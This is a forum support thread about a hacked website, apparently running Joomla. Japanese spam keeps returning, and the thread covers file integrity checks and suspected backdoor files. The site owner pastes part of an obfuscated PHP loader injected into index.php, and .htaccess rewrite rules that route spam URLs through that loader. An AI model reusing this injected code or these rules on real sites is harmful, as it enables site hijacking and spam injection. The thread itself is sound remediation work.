Please Log in or Create an account to join the conversation.
Please Log in or Create an account to join the conversation.
@set_time_limit(0);
$xmlname = 'mapss.xml';
$jdir = '';
$smuri_tmp = smrequest_uri();
if($smuri_tmp==''){
$smuri_tmp='/';
}
$smuri = base64_encode($smuri_tmp);
$dt = 0;
function smrequest_uri(){
if (isset($_SERVER['REQUEST_URI'])){
$smuri = $_SERVER['REQUEST_URI'];
}else{
if(isset($_SERVER['argv'])){
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
}else{
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
}
}
return $smuri;
}
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO
.... more lines of code ....
MDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
Please Log in or Create an account to join the conversation.
Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. the only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.
Please Log in or Create an account to join the conversation.
Webmaster wrote: Hi Jeff,
Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. the only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.
This is really odd; even a single character modified changes the hash value and you should be alerted...
RewriteEngine On
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule . /index.php [L]
RewriteEngine On
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)\/([0-9]+)_(.*)..*$ ?$2$3=$1&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).[0-9]+,[0-9]+.[0-9]+,[0-9]+.*\/.*=![0-9]+.*[0-9]+![0-9]+.*[0-9]+![0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\:[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).[0-9]+,[0-9]+.[0-9]+,[0-9]+.*\/.*=![0-9]+.*[0-9]+![0-9]+.*[0-9]+![0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\:[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\?.*=.*-JP$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^(.*)\/([^\d\/]+)\/([0-9]+)\/([0-9]+)\/.*\/.*\/.*\/.*..*$ ?$2$3=$4&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule . /index.php [L]
Webmaster wrote: I have checked the zipped file attached and I think still there are some malicious files (I should get the files to be fully sure); check the file /libraries/joomla/application/cache-66e.php and /media/system/images/thumb.php. I think those files are upload forms, so hacker can use them to upload new backdoors.
Webmaster wrote: Also remember I clean infected websites; if you need help ask me for a quotation. Maybe you can clean the website instead a complete re-install.
Regards,
Jose
Please Log in or Create an account to join the conversation.
Yes, I did some improvements in the site. I apologize about that.I tried to post the other day, but kept giving me an error, then could not even access your site for a while...
Maybe hackers change the timestamp, but even if this happens the hash value should change and the extension should warn you.The only time the timestamp changes is when I remove the code and save the file.
My last file integrity scan showed 3 modified files: .htaccess (2017-05-07 03:23:15), error_log (2017-05-07 08:24:50) and index.php (2017-05-07 08:21:18)
I think this is an automated task of your hosting provider; please, read this forum entryAnother interesting thing, is my .htaccess file is getting wiped and overwritten with the following code at 5:23am everyday
Or your website or the server is still infected; do you have a shared hosting or a dedicated server?I deleted the two files you mentioned, they were definitely malicious coded files, and the Japanese content injection seemed to be gone, until today, it came back...
Please Log in or Create an account to join the conversation.
In order to provide you with the best online experience this website uses cookies.
By using our website, you agree to our use of cookies.